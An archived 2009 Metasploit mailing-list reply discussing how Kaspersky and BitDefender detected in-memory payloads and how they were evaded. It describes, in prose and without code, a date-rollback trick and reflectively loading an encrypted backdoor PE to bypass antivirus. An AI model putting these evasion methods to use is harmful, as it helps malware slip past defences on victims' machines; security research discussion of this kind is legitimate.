Metasploit mailing list archives
Video Bypassing AntiVirus with Metasploit
From: arcsighter at gmail.com (ArcSighter Elite)
Date: Thu, 15 Jan 2009 16:47:27 -0500
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Thierry Zoller wrote:
Dear ArcSighter Elite, == Exception to these are KAV and BitDefender who implement different proactive methods that detect this memory stuff. == They are easy to bypass too, I remember (just an example) that KAV was bypassable by setting the date back to a date the license was invalid (kept me lauging for a few minutes).
Pardon me, but that was the first trick against KAV and is silly; the best that could be achieved from that technique is setting the date back, then finding the KAV's notification window and closing it, and then loading the backdoor, then restoring date, and closing another window. Summarizing, silly. Secondly, let me tell you I'm off the topic as I said, but if my memory doesn't fail to me, the proactive's kav defense was triggered by its hook into ReadProcessMemory and CreateProcess. BitDefender went a little bit more consious and implemented some sort of REAL memory scan. Those were the first-generation crypters as far as we go today. I didn't say they couldn't be bypassed, because I did, I just said they were a little bit trickier. As I said, and for the record if I have no time to finish it: *ALL* AVs should be bypassed by creating a process that reflectively loads a PE (backdoor) encrypted from its resource or data sections. Of course, the backdoor behavior could trigger the AV in some cases, such as registry access, that's why I preferred coding my own. Sincerely. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAklvrusACgkQH+KgkfcIQ8dM2gCgzVvRa6APyWCKtkkQPIwG7kde zfgAoOADsDBH4JyLIDS2suquEN+jrm4g =o6oU -----END PGP SIGNATURE-----
Current thread:
- Video Bypassing AntiVirus with Metasploit Jerome Athias (Jan 15)
- Video Bypassing AntiVirus with Metasploit Thierry Zoller (Jan 15)
- Video Bypassing AntiVirus with Metasploit Ronald L. Rosson Jr. (Jan 15)
- Video Bypassing AntiVirus with Metasploit Thierry Zoller (Jan 15)
- Video Bypassing AntiVirus with Metasploit ArcSighter Elite (Jan 15)
- Video Bypassing AntiVirus with Metasploit Thierry Zoller (Jan 15)
- Video Bypassing AntiVirus with Metasploit ArcSighter Elite (Jan 15)
- Video Bypassing AntiVirus with Metasploit Thierry Zoller (Jan 15)
- Video Bypassing AntiVirus with Metasploit ArcSighter Elite (Jan 16)
- Video Bypassing AntiVirus with Metasploit Ronald L. Rosson Jr. (Jan 15)
- Video Bypassing AntiVirus with Metasploit Thierry Zoller (Jan 15)
- Video Bypassing AntiVirus with Metasploit ArcSighter Elite (Jan 15)